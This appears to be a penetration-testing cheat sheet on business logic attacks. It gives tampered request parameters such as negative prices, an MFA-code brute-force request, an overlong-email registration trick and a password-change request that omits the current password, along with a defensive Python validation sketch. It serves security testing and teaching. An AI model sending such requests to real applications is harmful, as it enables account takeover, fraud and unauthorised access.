# Business Logic Attack

Business Logic is the part of the program that encodes the real-world business rules that determine how data can be created, stored, and changed.

### Change Request Params to Unexpected Values

```text
productId=-1
productId=a
productId=  # empty value

price=-1000
price=1000-
price=%1000
price=%-1000
```
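Seen from the server side, the values above are what input validation has to reject. The following is an added example, not part of the original page: a sketch of a handler that parses `productId` strictly and never charges a client-supplied `price`. The `CATALOG` contents, the function names and the `Rejected` exception are hypothetical, and `params` is assumed to be the already-decoded form dictionary.

```python
import re
from decimal import Decimal

# Hypothetical server-side catalogue: the only trusted source of prices.
CATALOG = {1: Decimal("1337.00"), 2: Decimal("9.99")}

ID_RE = re.compile(r"[1-9][0-9]{0,8}")                 # positive integer, ASCII digits
PRICE_RE = re.compile(r"[0-9]{1,7}(?:\.[0-9]{1,2})?")  # unsigned, at most 2 decimals


class Rejected(ValueError):
    """Raised when a request parameter fails validation."""


def parse_product_id(raw):
    # Rejects missing, empty, negative and non-numeric ids before int() is called.
    if not isinstance(raw, str) or not ID_RE.fullmatch(raw):
        raise Rejected("productId must be a positive integer")
    product_id = int(raw)
    if product_id not in CATALOG:
        raise Rejected("unknown productId")
    return product_id


def price_for(params):
    """Return the price to charge for a decoded form-parameter dict."""
    product_id = parse_product_id(params.get("productId"))
    trusted = CATALOG[product_id]
    raw = params.get("price")
    if raw is not None:
        # A client-sent price is only ever compared, never used.
        if (not isinstance(raw, str) or not PRICE_RE.fullmatch(raw)
                or Decimal(raw) != trusted):
            raise Rejected("price does not match catalogue")
    return trusted


def is_rejected(params):
    """True when the request would be refused (worth logging as tampering)."""
    try:
        price_for(params)
    except Rejected:
        return True
    return False
```
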

### Exploit Broken Two-Factor

#### Brute Force an MFA Code

```http
POST /login HTTP/1.1
Cookie: verify=victim
...

<!-- Brute force the digit code -->
mfa-code=1111
```

### Loop Back with 2,147,483,647

No content yet.

### Register with an Overly Long Email Address

```http
POST /register HTTP/1.1
...

username=attacker&password=pass1&email=aaaaaaaaaaaaa...aa@vulnerable.com.attacker.com
```

### Remove the Specific POST Params

```http
POST /change-password HTTP/1.1
...

<!-- Remove 'current-password' parameter -->
username=admin&new-password-1=newpass&new-password-2=newpass
```
